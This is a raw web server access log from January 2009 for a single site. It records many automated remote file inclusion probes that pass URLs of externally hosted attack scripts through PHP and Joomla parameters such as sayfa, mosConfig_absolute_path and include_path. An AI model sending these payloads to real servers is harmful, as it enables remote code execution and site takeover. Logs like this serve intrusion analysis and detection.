85.17.137.41 - - [04/Jan/2009:17:44:51 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:44:52 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:44:52 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:44:52 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:45:04 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:45:04 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:45:05 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:45:06 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:45:06 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:45:06 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.0.252.2 - - [04/Jan/2009:17:45:27 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.0.252.2 - - [04/Jan/2009:17:45:27 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.0.252.2 - - [04/Jan/2009:17:45:27 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:45:31 -0800] "GET /logs//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:45:32 -0800] "GET /main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.196.124.16 - - [04/Jan/2009:17:45:47 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.196.124.16 - - [04/Jan/2009:17:45:47 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.196.124.16 - - [04/Jan/2009:17:45:47 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:45:47 -0800] "GET /logs/access_080915.log%20%20//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:45:47 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:45:47 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:45:49 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:45:53 -0800] "GET /logs/access_080901.log%20%20//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:17:46:07 -0800] "GET /logs/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 2654 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:17:46:07 -0800] "GET /?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:46:26 -0800] "GET /logs/access_080908.log/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:46:26 -0800] "GET /?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:46:27 -0800] "GET /logs/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 200 2654 "-" "libwww-perl/5.810" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:46:53 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:47:05 -0800] "GET /logs/access_081006.log/?custompluginfile[]=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:47:22 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:47:48 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:47:49 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:47:49 -0800] "GET /logs/access_080915.log%20%20//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:47:49 -0800] "GET /logs/access_080901.log%20%20//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:48:04 -0800] "GET /logs/access_081208.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:48:11 -0800] "GET /logs/access_081222.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:48:23 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:17:48:48 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:48:56 -0800] "GET /logs/access_080915.log//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:48:56 -0800] "GET /main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:48:57 -0800] "GET /logs//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:48:57 -0800] "GET /logs/access_080901.log//main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:48:59 -0800] "GET /logs/access.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
113.30.66.5 - - [04/Jan/2009:17:49:04 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
194.135.103.242 - - [04/Jan/2009:17:49:07 -0800] "GET /logs/access_081013.log/?sourcedir=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:49:09 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.252.241.15 - - [04/Jan/2009:17:49:10 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
64.20.40.194 - - [04/Jan/2009:17:49:31 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:49:37 -0800] "GET /logs/access_081208.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
222.121.123.91 - - [04/Jan/2009:17:49:41 -0800] "GET /logs/access_081222.log//main.php?sayfa=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.204.231.202 - - [04/Jan/2009:17:50:09 -0800] "GET /logs///components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
85.204.231.202 - - [04/Jan/2009:17:50:13 -0800] "GET //components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
77.221.130.16 - - [04/Jan/2009:17:50:20 -0800] "GET /main.php?sayfa=http://gugakedu.co.kr/kboard//aid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:50:49 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:50:50 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:51:27 -0800] "GET /logs/access_081208.log/errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:51:27 -0800] "GET /errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:51:27 -0800] "GET /logs/errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.196.124.16 - - [04/Jan/2009:17:51:33 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
194.0.252.2 - - [04/Jan/2009:17:53:00 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:17:53:37 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:55:27 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
66.172.9.3 - - [04/Jan/2009:17:55:27 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.821" "www.vspeaking.com"
70.86.130.2 - - [04/Jan/2009:17:55:29 -0800] "GET /logs/access.log/errors.php?error=http://www.autismcenter.or.kr/cgi-bin/files/alb?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:55:35 -0800] "GET /logs/access_081208.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:55:35 -0800] "GET /logs/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:55:35 -0800] "GET /main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:37 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:37 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:37 -0800] "GET /logs/access_081208.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:55:37 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:53 -0800] "GET /logs/access_080901.log//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:53 -0800] "GET /main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:54 -0800] "GET /logs//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:17:55:54 -0800] "GET /logs/access_080915.log//main.php?sayfa=http://www.leegolf.com/vboard/idit.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:17:56:04 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:17:58:33 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
66.160.185.20 - - [04/Jan/2009:17:58:33 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://researchcore.org/publications/docs/spiegel_dulai.pdf? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:17:58:34 -0800] "GET /logs/access_081208.log/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:17:58:34 -0800] "GET /?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.vspeaking.com"
208.69.192.200 - - [04/Jan/2009:17:58:34 -0800] "GET /logs/?sourcedir=http://www.suntalent.com.tw//appserv/id??? HTTP/1.1" 200 2654 "-" "libwww-perl/5.811" "www.vspeaking.com"
218.232.109.160 - - [04/Jan/2009:17:59:33 -0800] "GET /logs/access_081208.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.109.160 - - [04/Jan/2009:17:59:34 -0800] "GET /logs//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
218.232.109.160 - - [04/Jan/2009:17:59:34 -0800] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
85.17.137.41 - - [04/Jan/2009:18:01:47 -0800] "GET /logs/access_081222.log/main.php?sayfa=http://e-arrahman.com/language/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
203.34.37.16 - - [04/Jan/2009:18:02:38 -0800] "GET /logs/errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
203.34.37.16 - - [04/Jan/2009:18:02:38 -0800] "GET /errors.php?error=http://znaes.webs.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:03:49 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:03:54 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:04:04 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:04:07 -0800] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.213.156 - - [04/Jan/2009:18:04:18 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
77.222.40.120 - - [04/Jan/2009:18:05:08 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
218.232.109.160 - - [04/Jan/2009:18:06:40 -0800] "GET /logs/access.log//kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.leegolf.com/vboard/data/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:18:07:54 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.239.0.245 - - [04/Jan/2009:18:07:54 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:09:11 -0800] "GET /includes/print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:18:14:14 -0800] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
61.19.42.210 - - [04/Jan/2009:18:14:14 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.aukcio.dzsar.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.120 - - [04/Jan/2009:18:19:42 -0800] "GET /logs/scripts.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.120 - - [04/Jan/2009:18:19:42 -0800] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.120 - - [04/Jan/2009:18:19:42 -0800] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
77.222.40.120 - - [04/Jan/2009:18:20:03 -0800] "GET /logs/access.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:18:21:24 -0800] "GET /logs//atom.php5?page=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
91.186.21.200 - - [04/Jan/2009:18:21:24 -0800] "GET /atom.php5?page=http://203.114.112.155/webboard1234/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:18:23:12 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:18:23:12 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
85.236.53.4 - - [04/Jan/2009:18:23:12 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://plainsimple.org/test/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:23:16 -0800] "GET /logs//?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 2659 "-" "libwww-perl/5.65" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:23:18 -0800] "GET /?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.65" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:23:20 -0800] "GET /logs/access.log//?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:18:23:33 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:18:23:33 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:18:23:33 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:18:23:36 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:18:23:36 -0800] "GET /logs/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
81.176.232.101 - - [04/Jan/2009:18:23:37 -0800] "GET /logs/access.log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
128.121.79.26 - - [04/Jan/2009:18:25:40 -0800] "GET /logs/access_081020.log//?include_path=http://jeticu.com/ktmlpro/includes/ktedit/ctrl.txt????%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:43 -0800] "GET /logs/access_080901.log//print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
116.122.158.46 - - [04/Jan/2009:18:25:44 -0800] "GET /print_category.php?setup[use_category]=1&dir=http://www.elitewheels.ru/images/stories/.cnn? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
